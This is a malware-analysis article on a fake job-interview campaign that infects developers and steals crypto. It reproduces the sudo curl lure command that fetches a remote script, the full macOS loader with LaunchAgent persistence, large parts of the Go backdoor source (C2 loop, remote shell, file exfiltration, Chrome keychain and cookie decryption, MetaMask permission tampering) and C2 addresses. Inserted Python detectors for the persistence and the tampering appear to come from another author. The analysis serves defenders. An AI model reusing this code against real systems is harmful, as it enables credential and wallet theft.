Cybercrooks Are Using Fake Job Listings to Steal Crypto

by Moonlock (by MacPaw), 2025/02/13

Too Long; Didn't Read

An ongoing online campaign targets job seekers through fake interview websites, tricking them into downloading barebones yet highly effective malware. Unlike complex malware that relies on obfuscation techniques, this attack relies on simplicity. Most notably, it attempts to tamper with the permissions of the cryptocurrency-related Chrome extension MetaMask.

Written by the MacPaw Moonlock Lab team


An ongoing online campaign targets job seekers through fake interview websites, tricking them into downloading barebones yet highly effective malware. Unlike complex malware that relies on obfuscation techniques, this attack relies on simplicity: it ships the source code alongside a Go binary, which makes it cross-platform. Most notably, it attempts to tamper with the permissions of the cryptocurrency-related Chrome extension MetaMask, potentially draining the victims' wallets.


The campaign is still active, with new domains appearing constantly and luring more victims. Several individual security researchers and companies, such as SentinelOne, dmpdump, and ENKI WhiteHat, have published excellent analyses. Our team conducted independent research, and in this article we share our findings and hunting techniques.


The Moonlock Lab team began tracking this malware on October 9, 2024, when the first components of the backdoor started to appear. A backdoor is a type of malicious software that hides on a system and allows threat actors to issue commands remotely, as if they were the legitimate owners of the workstation. Such attacks typically use so-called C2 (Command and Control) servers to send and execute commands.


What makes this attack different from the others we commonly see is that it consists of multiple stages and is designed to persist on the victim's machine rather than performing a single smash-and-grab of data. A complete overview of the attack stages is shown in the image below.



The first well-constructed thread on X that we noticed was posted by @tayvano_, who shared information about a malicious campaign that appears to primarily target software developers seeking jobs at blockchain companies.


'Usually it starts with a "recruiter" from a well-known company like Kraken, MEXC, Gemini, Meta. The pay ranges + message style are appealing, even to those not actively looking. Especially on LinkedIn. Also freelance sites, job boards, tg, discord, etc.


To find the latest version of this malware, it was essential to monitor new domains hosting the fake interview sites. For this purpose, our team relied on two unchanging indicators that these domains share:


  • The same URL pattern "/video-questions/create/" followed by a hard-coded ID:

Source: urlscan.io

  • The same image (logo.png) on the pages:

Source: urlscan.io


Even though some of the domains used during this campaign have been taken down, new ones keep appearing, the latest still online: smarthiretop[.]online. Our team has observed more than 20 active domains since November 2024.

After investigating the domains, we found that some of them share the same IP address. This commonly happens because attackers use bulletproof hosting providers, which allow multiple domains to be hosted on the same server. In addition, hosting multiple domains on a single IP lets threat actors rotate domains without changing the backend infrastructure.

This malicious infrastructure is hosted on various servers distributed around the world. As shown on the map below, most of the servers are located in the US, while others are spread across other countries.


The malicious command that interviewees are asked to run appears in a pop-up window shown when they visit the malicious website. It is JS code bundled into the file main.39e5a388.js in this case. Such file names are typically generated by hashing or fingerprinting during the web application's build process (Reference: https://urlscan.io/result/0ad23f64-4d61-49c8-8ed8-0d33a07419f4).


One of these pages has this embedded JS file with the following SHA256 hash:

  • f729af8473bf98f848ef2dde967d8d301fb71888ee3639142763ebb16914c803


Inside the built JS file we can easily see the same instructions the victims are asked to execute:


After understanding how the threat actor distributes the malware, our main goal was to quickly obtain samples and develop signatures for our users. The first direct mention of "production-ready" samples and their SHA-256 hashes that we found was in this thread:

https://x.com/dimitribest/status/1873343968894689472 .


It included five hashes, namely:

  • 96e78074218a0f272f7f94805cabde1ef8d64ffb *file.zip;
  • 86dea05a8f40cf3195e3a6056f2e968c861ed8f1 *nodejs.zip;
  • 321972e4e72c5364ec1d5b9e488d15c641fb1819 *nvidia-real.zip;
  • 3405469811bae511e62cb0a4062aadb523cad263 *VCam_arm64.zip;
  • c0baa450c5f3b6aacde2807642222f6d22d5b4bb *VCam_intel.zip.


Beyond that, our team started downloading the malicious scripts as if we had been tricked into it, just like the victims. At one point, the following command was used on the fake interview websites:

Command from the screenshot (do not run it!):

 sudo sh -c 'curl -k -o /var/tmp/ffmpeg.sh https://api.nvidia-release.org/ffmpeg-ar.sh && chmod +x /var/tmp/ffmpeg.sh && nohup bash /var/tmp/ffmpeg.sh >/dev/null 2>&1 &'


It performs the actions listed below:

  • Downloads the file ffmpeg-ar.sh from api[.]nvidia-release[.]org;
  • Saves it to /var/tmp/ffmpeg.sh;
  • Executes the file and redirects all output to /dev/null to hide it from the user.


Inside the ffmpeg.sh file saved in the temporary folder, we can find the entry point of this attack, which includes:

  • Downloading second-stage ZIP files with the payload;
  • Dropping a PLIST file and registering a service for persistence;
  • Performing cleanup.


As we can see in the script below, it is built specifically for macOS, for both the Intel and ARM variants. After determining the current CPU model, it downloads a ZIP archive containing several files. A detailed review of this script can be found in this blog, as mentioned by SentinelOne in their recent report.

    #!/bin/bash

    # Define variables for URLs
    ZIP_URL_ARM64="https://api.nvidia-cloud.online/VCam1.update"
    ZIP_URL_INTEL="https://api.nvidia-cloud.online/VCam2.update"
    ZIP_FILE="/var/tmp/VCam.zip"                       # Path to save the downloaded ZIP file
    WORK_DIR="/var/tmp/VCam"                           # Temporary directory for extracted files
    EXECUTABLE="vcamservice.sh"                        # Replace with the name of the executable file inside the ZIP
    APP="ChromeUpdateAlert.app"                        # Replace with the name of the app to open
    PLIST_FILE=~/Library/LaunchAgents/com.vcam.plist   # Path to the plist file

    # Determine CPU architecture
    case $(uname -m) in
        arm64) ZIP_URL=$ZIP_URL_ARM64 ;;
        x86_64) ZIP_URL=$ZIP_URL_INTEL ;;
        *) exit 1 ;;   # Exit for unsupported architectures
    esac

    # Create working directory
    mkdir -p "$WORK_DIR"

    # Function to clean up
    cleanup() {
        rm -rf "$ZIP_FILE"
    }

    # Download, unzip, and execute
    if curl -s -o "$ZIP_FILE" "$ZIP_URL" && [[ -f "$ZIP_FILE" ]]; then
        unzip -o -qq "$ZIP_FILE" -d "$WORK_DIR"
        if [[ -f "$WORK_DIR/$EXECUTABLE" ]]; then
            chmod +x "$WORK_DIR/$EXECUTABLE"
        else
            cleanup
            exit 1
        fi
    else
        cleanup
        exit 1
    fi

    # Step 4: Register the service
    mkdir -p ~/Library/LaunchAgents
    cat > "$PLIST_FILE" <<EOL
    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
        <key>Label</key>
        <string>com.vcam</string>
        <key>ProgramArguments</key>
        <array>
            <string>$WORK_DIR/$EXECUTABLE</string>
        </array>
        <key>RunAtLoad</key>
        <true/>
        <key>KeepAlive</key>
        <false/>
    </dict>
    </plist>
    EOL
    chmod 644 "$PLIST_FILE"
    if ! launchctl list | grep -q "com.vcam"; then
        launchctl load "$PLIST_FILE"
    fi

    # Step 5: Run ChromeUpdateAlert.app
    if [[ -d "$WORK_DIR/$APP" ]]; then
        open "$WORK_DIR/$APP" &
    fi

    # Final cleanup
    cleanup

Reference: VirusTotal
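The persistence step in the loader above (a LaunchAgent plist whose ProgramArguments points at a script under /var/tmp) is something a defender can hunt for directly. The following Python is an added example, not code from the article or from the malware: it parses launchd plists with the standard library and flags agents whose program lives in a temporary directory; the plist samples are constructed (the first one from the label and path the script writes), and the function names are my own.

```python
"""Hunt for LaunchAgent persistence like the one the ffmpeg.sh loader drops.

Added example, not code from the Moonlock article or the malware: it
flags launchd agents whose program lives under a temporary directory.
"""
import plistlib
from pathlib import Path
from typing import Dict, List, Optional

# Directories where a legitimate LaunchAgent program should never live.
SUSPICIOUS_PREFIXES = ("/var/tmp/", "/private/var/tmp/", "/tmp/", "/private/tmp/", "/Users/Shared/")

# Constructed sample shaped like the plist the loader writes (label and path from the article).
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.vcam</string>
    <key>ProgramArguments</key>
    <array>
        <string>/var/tmp/VCam/vcamservice.sh</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <false/>
</dict>
</plist>
"""

# Constructed benign agent for contrast: a program inside an application bundle.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.example.sync</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Applications/Example.app/Contents/MacOS/sync</string>
        <string>--quiet</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
"""


def program_path(plist: Dict) -> Optional[str]:
    """Return what launchd would execute: Program, or ProgramArguments[0]."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else None


def assess_launch_agent(raw: bytes) -> Dict:
    """Parse one plist and return its label, program and the reasons it looks suspicious."""
    plist = plistlib.loads(raw)
    prog = program_path(plist)
    reasons: List[str] = []
    if prog is None:
        reasons.append("no program to run")
    else:
        if prog.startswith(SUSPICIOUS_PREFIXES):
            reasons.append("program under a temporary directory: " + prog)
        if prog.endswith(".sh") and plist.get("RunAtLoad"):
            reasons.append("shell script started at login")
    return {"label": plist.get("Label"), "program": prog,
            "reasons": reasons, "suspicious": bool(reasons)}


def scan_launch_agents(directory: Path) -> List[Dict]:
    """Assess every .plist in a LaunchAgents directory, e.g. ~/Library/LaunchAgents."""
    findings = []
    for path in sorted(directory.glob("*.plist")):
        try:
            result = assess_launch_agent(path.read_bytes())
        except Exception as exc:  # an unparseable agent plist is itself worth a look
            result = {"label": None, "program": None,
                      "reasons": ["unparseable: " + str(exc)], "suspicious": True}
        result["file"] = str(path)
        findings.append(result)
    return findings


if __name__ == "__main__":
    for blob in (SAMPLE_PLIST, BENIGN_PLIST):
        print(assess_launch_agent(blob))
    for finding in scan_launch_agents(Path.home() / "Library" / "LaunchAgents"):
        if finding["suspicious"]:
            print("SUSPICIOUS", finding)
```

Running it as a script also walks the current user's LaunchAgents folder; extend SUSPICIOUS_PREFIXES with whatever drop locations your own telemetry shows.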


The contents of the archive (Intel CPU version) downloaded by the script are listed below:

All the files in the archive can be divided into a few groups:

  • Go source code components and its binaries (https://github.com/golang/go)
  • ChromeUpdateAlert.app – an AppBundle containing a Mach-O binary that collects the user's IP and password
  • The backdoor and stealer in source-code form
  • vcamservice.sh – a script that launches the Go-based executable


Interestingly, the archive is about 75 MB in size, mainly because it includes many components of the official Go libraries and binaries.

Analysis of the Mach-O password stealer

One of the files we have seen used for a long time in this attack is a universal Mach-O binary with 2 architectures, called CameraAccess (SHA256: 3c4becde20e618efb209f97581e9ab6bf00cbd63f51f7ac2 7ed59).


It mimics the Google Chrome icon, which makes ordinary users believe the file is legitimate and discourages them from deleting it.

The code is written in Swift, and no strong obfuscation techniques were found, which makes the execution flow easy to understand.

It displays a window that looks like a system notification window, asking the user to grant microphone access, supposedly requested by the Google Chrome application.

Even if the user chooses "Remind Me Later," the password prompt window still appears.

The application claims it needs microphone access; however, it is sandboxed, and no real permission request for the microphone is ever made.

After the user enters their password, the malware requests the external IP address of the host it is running on. It then uploads a password.txt file to a Dropbox folder named after the user's external IP address.

In the screenshot below, the Dropbox API URL can be seen.

While inspecting the network traffic, we can see attempts to obtain the victim's public IP address.

After the external IP address is received, we can see requests to Dropbox to upload the IP-password pair using hard-coded credentials.

Our team reported this incident to Dropbox, along with the details used to carry out this abuse campaign.

Analysis of the Go-written backdoor

It is important to note that the ZIP file downloaded by the ffmpeg.sh script contains the plaintext source code of the backdoor, meaning it was neither precompiled nor obfuscated. This sped up the analysis considerably but also raised questions about proper attribution. Needless to say, APT groups from the DPRK are usually far more sophisticated.


Another unusual tactic is the inclusion of the Go binary (/bin/go) in the archive instead of simply compiling the full code. However, since Go is not a default application on most operating systems, the threat actors probably included it for better compatibility. This makes sense given that the malware is cross-platform and targets macOS, Linux, and Windows at the same time.


A graph showing the relationships and a detailed description of each notable sample can be found here: Overview

Entry point

Inside the archive there is a script called vcampdate.sh. It runs right after the payload is extracted and simply invokes /bin/go (bundled in the ZIP) while passing it the path to the main Golang application (app.go in this case).

    #!/bin/bash

    # Set the working directory to the folder where this script is located
    cd "$(dirname "$0")"

    echo "Installing Dependencies..."

    project_file="app.go"
    ./bin/go run "$project_file"

    exit 0


The installer application (app.go) is responsible for generating a unique UUID for the user's workstation, initializing the C2 URL, and starting the main loop. In the code we can see single-line comments, supporting message prints, and some commented-out code. It also includes URLs probably intended for testing, which the developers forgot to remove. Although the C2 IP address differs from the one in the main campaign, the samples from 2024 share the same functionality and point to the same data.


A later call to core.StartMainLoop(id, url) brings us to the core/ folder with the files loop.go and work.go. The loop.go file is mainly responsible for receiving and executing commands from the C2, calling small modules that collect sensitive data, and uploading it to the remote server. It contains many functions, 8 of which we would like to highlight and examine in more detail.

StartMainLoop function

This function uses the config submodule to initialize the available commands and listen for incoming ones. Below you can find a table with all the commands and their corresponding codes. A more detailed analysis of the backdoor's functionality can be found in this publication.

    Command name       Hard-coded name   Description
    COMMAND_INFO       qwer              Get username, host, OS, arch
    COMMAND_UPLOAD     asdf              Upload and decompress a malicious archive from the C2 to the host
    COMMAND_DOWNLOAD   zxcv              Download stolen data to the C2
    COMMAND_OSSHELL    vbcx              Start an interactive shell between the host and the C2 (run the remote controller's commands maliciously)
    COMMAND_AUTO       r4ys              Automatically collect sensitive data
    COMMAND_WAIT       ghdj              Wait X seconds
    COMMAND_EXIT       dgh               Exit the main loop (set alive=false)

Based on the command received from the C2, the corresponding function is called.

    func StartMainLoop(id string, url string) {
        var (
            msg_type string
            msg_data [][]byte
            msg      string
            cmd      string
            cmd_type string
            cmd_data [][]byte
            alive    bool
        )

        // initialize
        cmd_type = config.COMMAND_INFO
        alive = true

        for alive {
            func() {
                // recover panic state
                defer func() {
                    if r := recover(); r != nil {
                        cmd_type = config.COMMAND_INFO
                        time.Sleep(config.DURATION_ERROR_WAIT)
                    }
                }()

                switch cmd_type {
                case config.COMMAND_INFO:
                    msg_type, msg_data = processInfo()
                case config.COMMAND_UPLOAD:
                    msg_type, msg_data = processUpload(cmd_data)
                case config.COMMAND_DOWNLOAD:
                    msg_type, msg_data = processDownload(cmd_data)
                case config.COMMAND_OSSHELL:
                    msg_type, msg_data = processOsShell(cmd_data)
                case config.COMMAND_AUTO:
                    msg_type, msg_data = processAuto(cmd_data)
                case config.COMMAND_WAIT:
                    msg_type, msg_data = processWait(cmd_data)
                case config.COMMAND_EXIT:
                    alive = false
                    msg_type, msg_data = processExit()
                default:
                    panic("problem")
                }

                msg = command.MakeMsg(id, msg_type, msg_data)
                cmd, _ = transport.HtxpExchange(url, msg)
                cmd_type, cmd_data = command.DecodeMsg(cmd)
            }()
        }
    }

processInfo function

This function collects basic system information such as the username, hostname, OS version, and architecture. It is worth noting that most popular infostealers collect far more system information than this malware does.

    func processInfo() (string, [][]byte) {
        user, _ := user.Current()
        host, _ := os.Hostname()
        os := runtime.GOOS
        arch := runtime.GOARCH
        print("user: " + user.Username + ", host: " + host + ", os: " + os + ", arch: " + arch + "\n")
        data := [][]byte{
            []byte(user.Username),
            []byte(host),
            []byte(os),
            []byte(arch),
            []byte(config.DAEMON_VERSION),
        }
        return config.MSG_INFO, data
    }

processUpload function

In this context, upload denotes sending an archived file from the C2 to the infected host, followed by its decompression. It also reports whether the decompression succeeded.

    func processUpload(data [][]byte) (string, [][]byte) {
        var log string
        var state string
        path := string(data[0])
        buf := bytes.NewBuffer(data[1])
        err := util.Decompress(buf, path)
        if err == nil {
            log = fmt.Sprintf("%s : %d", path, len(data[1]))
            state = config.LOG_SUCCESS
        } else {
            log = fmt.Sprintf("%s : %s", path, err.Error())
            state = config.LOG_FAIL
        }
        return config.MSG_LOG, [][]byte{
            []byte(state),
            []byte(log),
        }
    }

processDownload function

This function is the opposite of the previous one. It compresses a directory of previously collected files into a tar.gz archive.

    func processDownload(data [][]byte) (string, [][]byte) {
        var file_data []byte
        var err error
        path := string(data[0])
        _, file := filepath.Split(path)
        info, _ := os.Stat(path)
        if info.IsDir() {
            var buf bytes.Buffer
            err = util.Compress(&buf, []string{path}, false)
            file = fmt.Sprintf("%s.tar.gz", file)
            file_data = buf.Bytes()
        } else {
            file_data, err = os.ReadFile(path)
        }
        if err == nil {
            return config.MSG_FILE, [][]byte{[]byte(config.LOG_SUCCESS), []byte(file), file_data}
        } else {
            return config.MSG_FILE, [][]byte{[]byte(config.LOG_FAIL), []byte(err.Error())}
        }
    }

processOsShell function

This is the function that makes it a real backdoor. It waits for a malicious command and tries to execute it. The command may carry command-line arguments, and the output is sent directly to the C2.

    func processOsShell(data [][]byte) (string, [][]byte) {
        mode := string(data[0]) // mode
        timeout, _ := strconv.ParseInt(string(data[1]), 16, 64)
        shell := string(data[2])
        args := make([]string, len(data[3:]))
        for index, elem := range data[3:] {
            args[index] = string(elem)
        }

        if mode == config.SHELL_MODE_WAITGETOUT {
            // wait and get result mode
            ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout))
            defer cancel()
            cmd := exec.CommandContext(ctx, shell, args...)
            out, err := cmd.Output()
            if err != nil {
                return config.MSG_LOG, [][]byte{
                    []byte(config.LOG_FAIL),
                    []byte(err.Error()),
                }
            } else {
                return config.MSG_LOG, [][]byte{
                    []byte(config.LOG_SUCCESS),
                    out,
                }
            }
        } else {
            // start and detach mode
            c := exec.Command(shell, args...)
            err := c.Start()
            if err != nil {
                return config.MSG_LOG, [][]byte{
                    []byte(config.LOG_FAIL),
                    []byte(err.Error()),
                }
            } else {
                return config.MSG_LOG, [][]byte{
                    []byte(config.LOG_SUCCESS),
                    []byte(fmt.Sprintf("%s %s", shell, strings.Join(args, " "))),
                }
            }
        }
    }

processAuto function

This is the entry point of the stealing flow. The function contains several calls into the files located in the auto/ folder. They include grabbers, processors or modifiers of the following data:

  • Keychain
  • Chrome login data
  • Chrome cookies
  • Chrome MetaMask extension (keys, permissions, etc.)
  • Chrome profile

    func processAuto(data [][]byte) (string, [][]byte) {
        var (
            msg_type string
            msg_data [][]byte
        )
        mode := string(data[0])
        switch mode {
        case config.AUTO_CHROME_GATHER:
            msg_type, msg_data = auto.AutoModeChromeGather()
        case config.AUTO_CHROME_PREFRST:
            msg_type, msg_data = auto.AutoModeChromeChangeProfile()
        case config.AUTO_CHROME_COOKIE:
            msg_type, msg_data = auto.AutoModeChromeCookie()
        case config.AUTO_CHROME_KEYCHAIN:
            msg_type, msg_data = auto.AutoModeMacChromeLoginData()
        default:
            msg_type = config.MSG_LOG
            msg_data = [][]byte{[]byte(config.LOG_FAIL), []byte("unknown auto mode")}
        }
        return msg_type, msg_data
    }

processWait function

A utility function used to put the backdoor into sleep mode while it waits for further commands.

    func processWait(data [][]byte) (string, [][]byte) {
        duration, _ := strconv.ParseInt(string(data[0]), 16, 64)
        time.Sleep(time.Duration(duration))
        send_data := make([]byte, 128)
        rand.Read(send_data)
        return config.MSG_PING, [][]byte{send_data}
    }

processExit function

A utility function used to quit the main C2 communication loop.

    func processExit() (string, [][]byte) {
        return config.MSG_LOG, [][]byte{
            []byte(config.LOG_SUCCESS),
            []byte("exited"),
        }
    }

Implementation of the automated Chrome data collection

The auto/ folder contains a set of Go apps:

  • basic.go

        const (
            userdata_dir_win       = "AppData\\Local\\Google\\Chrome\\User Data\\"
            userdata_dir_darwin    = "Library/Application Support/Google/Chrome/"
            userdata_dir_linux     = ".config/google-chrome"
            extension_dir          = "nkbihfbeogaeaoehlefnkodbefgpgknn"
            extension_hash_key     = "protection.macs.extensions.settings.nkbihfbeogaeaoehlefnkodbefgpgknn"
            extension_setting_key  = "extensions.settings.nkbihfbeogaeaoehlefnkodbefgpgknn"
            secure_preference_file = "Secure Preferences"
            logins_data_file       = "Login Data"
            keychain_dir_darwin    = "Library/Keychains/login.keychain-db"
        )

    • Here we can see the defined constants with the data targeted for capture; it becomes clear that the main focus is the MetaMask extension.
  • chrome_change_pref.go

        // get json string
        func getExtJsonString() string {
            return `{
          "active_permissions": {
            "api": ["activeTab","clipboardWrite","notifications","storage","unlimitedStorage","webRequest"],
            "explicit_host": ["*://*.eth/*","http://localhost:8545/*","https://*.codefi.network/*","https://*.cx.metamask.io/*","https://*.infura.io/*","https://chainid.network/*","https://lattice.gridplus.io/*"],
            "manifest_permissions": [],
            "scriptable_host": ["*://connect.trezor.io/*/popup.html","file:///*","http://*/*","https://*/*"]
          },
          "commands": {"_execute_browser_action": {"suggested_key": "Alt+Shift+M", "was_assigned": true}},
          "content_settings": [],
          "creation_flags": 38,
          "events": [],
          "first_install_time": "13361518520188298",
          "from_webstore": false,
          "granted_permissions": {
            "api": ["activeTab","clipboardWrite","notifications","storage","unlimitedStorage","webRequest"],
            "explicit_host": ["*://*.eth/*","http://localhost:8545/*","https://*.codefi.network/*","https://*.cx.metamask.io/*","https://*.infura.io/*","https://chainid.network/*","https://lattice.gridplus.io/*"],
            "manifest_permissions": [],
            "scriptable_host": ["*://connect.trezor.io/*/popup.html","file:///*","http://*/*","https://*/*"]
          },
          "incognito_content_settings": [],
          "incognito_preferences": {},
          "last_update_time": "13361518520188298",
          "location": 4,
          "newAllowFileAccess": true,
          "path": "C:\\ProgramData\\11.16.0_0",
          "preferences": {},
          "regular_only_preferences": {},
          "state": 1,
          "was_installed_by_default": false,
          "was_installed_by_oem": false,
          "withholding_permissions": false
        }`
        }

        // chrome kill
        if runtime.GOOS == "windows" {
            cmd := exec.Command("cmd", "/c", "taskkill /f /im chrome.exe")
            cmd.Run()
        } else {
            cmd := exec.Command("/bin/sh", "-c", "killall chrome")
            cmd.Run()
        }

    • Kills all currently running Chrome processes and changes certain permissions of the MetaMask extension.
    • The JSON configuration suggests potentially dangerous behavior of the extension because of its broad permissions and manual installation method.
    • The "webRequest" permission allows the extension to intercept and modify network requests, enabling data theft or phishing attacks that steal sensitive information. The "clipboardWrite" permission could be used to capture and alter clipboard data, potentially stealing cryptocurrency addresses or passwords.
    • The "scriptable_host" section, which includes "file:///*", "https://*/*", and "http://*/*", allows script execution on every website and access to local files, enabling credential theft or unauthorized data exfiltration.
    • The "explicit_host" section grants access to cryptocurrency-related domains such as https://*.infura.io/* and https://*.cx.metamask.io/*, which could be used to manipulate transactions.
    • The "from_webstore": false field indicates that the extension was installed manually or through unauthorized means, suggesting possible tampering. The "commands" field assigns a keyboard shortcut that activates the extension, which could trigger hidden malicious behavior.
    • Taken together, these features show that the extension could be used for unauthorized access, data theft, or financial fraud.
  • chrome_cookie_darwin.go

        var (
            SALT       = "saltysalt"
            ITERATIONS = 1003
            KEYLENGTH  = 16
        )

        func getDerivedKey() ([]byte, error) {
            out, err := exec.Command(
                `/usr/bin/security`, `find-generic-password`, `-s`, `Chrome Safe Storage`, `-wa`, `Chrome`,
            ).Output()
            if err != nil {
                return nil, err
            }
            temp := []byte(strings.TrimSpace(string(out)))
            chromeSecret := temp[:len(temp)-1]
            if chromeSecret == nil {
                return nil, errors.New("Can not get keychain")
            }
            var chromeSalt = []byte("saltysalt")
            // @https://source.chromium.org/chromium/chromium/src/+/master:components/os_crypt/os_crypt_mac.mm;l=157
            key := pbkdf2.Key(chromeSecret, chromeSalt, 1003, 16, sha1.New)
            return key, nil
        }

    • Used to retrieve the Google Chrome-related password from the local storage.
    • Collects the Keychain data and additional storage into hallchain.tar.gz.
  • chrome_cookie_other.go

    • The same, but for Linux.
  • chrome_cookie_win.go

    • The same, but for Windows.
  • chrome_gather.go

        func AutoModeChromeGather() (string, [][]byte) {
            print("=========== AutoModeChromeGather ===========", runtime.GOOS, "\n")
            var (
                buf          bytes.Buffer
                userdata_dir string
                path_list    []string
            )

            // gather
            userdata_dir = getUserdataDir()

            // file system search
            _ = filepath.Walk(userdata_dir, func(path string, info os.FileInfo, err error) error {
                if info.Name() == extension_dir && strings.Contains(path, "Local Extension Settings") {
                    path_list = append(path_list, path)
                }
                return nil
            })
            _ = util.Compress(&buf, path_list, true)
            print("=========== End ===========\n")

            // return
            data := make([][]byte, 3)
            data[0] = []byte(config.LOG_SUCCESS)
            data[1] = []byte("gather.tar.gz")
            data[2] = buf.Bytes()
            msg_type := config.MSG_FILE
            return msg_type, data
        }

    • Collects the local extension settings (if present on the system) and packs them into gather.tar.gz
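A defender can inspect the same extensions.settings.<id> entry that basic.go names and chrome_change_pref.go rewrites, looking for the indicators discussed under chrome_change_pref.go above. The following Python is an added example, not the article's or the malware's code: the two Secure Preferences documents are constructed (the tampered one mirrors values from getExtJsonString), and lookup_dotted, tamper_indicators and check_profile are my own names.

```python
"""Flag tampered MetaMask settings in Chrome's Secure Preferences.

Added example, not from the article or the malware: it checks the
extensions.settings.<id> entry for from_webstore=false, scriptable_host
patterns covering every site or local files, and an absolute install path.
"""
import json
import re
from typing import Dict, List

METAMASK_ID = "nkbihfbeogaeaoehlefnkodbefgpgknn"     # extension id from basic.go
BROAD_HOSTS = {"file:///*", "http://*/*", "https://*/*", "<all_urls>"}
ABSOLUTE_PATH = re.compile(r"^(/|[A-Za-z]:\\)")     # '/...' or 'C:\...'

# Constructed, trimmed Secure Preferences document; the MetaMask entry mirrors
# the values the malware writes (see getExtJsonString above).
TAMPERED_PREFS = json.dumps({
    "extensions": {"settings": {METAMASK_ID: {
        "from_webstore": False,
        "location": 4,
        "path": "C:\\ProgramData\\11.16.0_0",
        "granted_permissions": {
            "api": ["activeTab", "clipboardWrite", "notifications",
                    "storage", "unlimitedStorage", "webRequest"],
            "scriptable_host": ["*://connect.trezor.io/*/popup.html",
                                "file:///*", "http://*/*", "https://*/*"],
        },
    }}},
})

# Constructed entry shaped like an ordinary Web Store install, for contrast.
CLEAN_PREFS = json.dumps({
    "extensions": {"settings": {METAMASK_ID: {
        "from_webstore": True,
        "location": 1,
        "path": METAMASK_ID + "\\11.16.0_0",
        "granted_permissions": {
            "api": ["activeTab", "clipboardWrite", "notifications",
                    "storage", "unlimitedStorage", "webRequest"],
            "scriptable_host": ["*://connect.trezor.io/*/popup.html"],
        },
    }}},
})


def lookup_dotted(doc: Dict, dotted_key: str) -> Dict:
    """Walk a dotted preference key such as 'extensions.settings.<id>' through nested dicts."""
    node = doc
    for part in dotted_key.split("."):
        if not isinstance(node, dict) or part not in node:
            return {}
        node = node[part]
    return node if isinstance(node, dict) else {}


def tamper_indicators(secure_prefs_json: str, ext_id: str = METAMASK_ID) -> List[str]:
    """Return the reasons the extension entry looks tampered with (empty list if none)."""
    entry = lookup_dotted(json.loads(secure_prefs_json), "extensions.settings." + ext_id)
    if not entry:
        return []
    reasons = []
    if entry.get("from_webstore") is False:
        reasons.append("from_webstore is false: not installed through the Web Store")
    granted = entry.get("granted_permissions", {})
    broad = BROAD_HOSTS.intersection(granted.get("scriptable_host", []))
    if broad:
        reasons.append("scriptable_host covers all sites or local files: " + ", ".join(sorted(broad)))
    path = entry.get("path", "")
    if ABSOLUTE_PATH.match(path):
        reasons.append("extension loaded from an absolute path outside the profile: " + path)
    return reasons


def check_profile(secure_preferences_path: str) -> List[str]:
    """Assess a real 'Secure Preferences' file (located under the user data dirs in basic.go)."""
    with open(secure_preferences_path, encoding="utf-8") as fh:
        return tamper_indicators(fh.read())


if __name__ == "__main__":
    for name, prefs in (("tampered", TAMPERED_PREFS), ("clean", CLEAN_PREFS)):
        print(name, tamper_indicators(prefs))
```

Chrome also keeps an HMAC for this entry under the protection.macs key the malware targets; a mismatch there is a further sign of external modification, but verifying it needs the per-install seed, so this check relies on the visible fields only.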

Conclusions

To conclude our analysis, we should highlight the most important points:

  • After a successful password theft, the victim's workstation can be accessed remotely via the C2 to steal additional data, including personal files stored on the system. This makes this malware approach far more dangerous than typical stealers, which usually run on the system once and collect only the files on their list.
  • The backdoor code is written in accordance with best programming practices, with comments left as they are, which leaves open the question of why the code was not precompiled.
  • Only a single cryptocurrency-related extension is targeted, probably counting on gaining remote access to manually search for other popular crypto tools and sensitive data on the system.
  • This campaign is still ongoing, which shows that the threat actors' technique remains effective and does not require rapid changes. However, we believe similar campaigns may soon emerge with updated infrastructure.

IOC

Domains


SHA256


C2

 hxxp://216.74.123.191:8080 hxxp://95.169.180.146:8080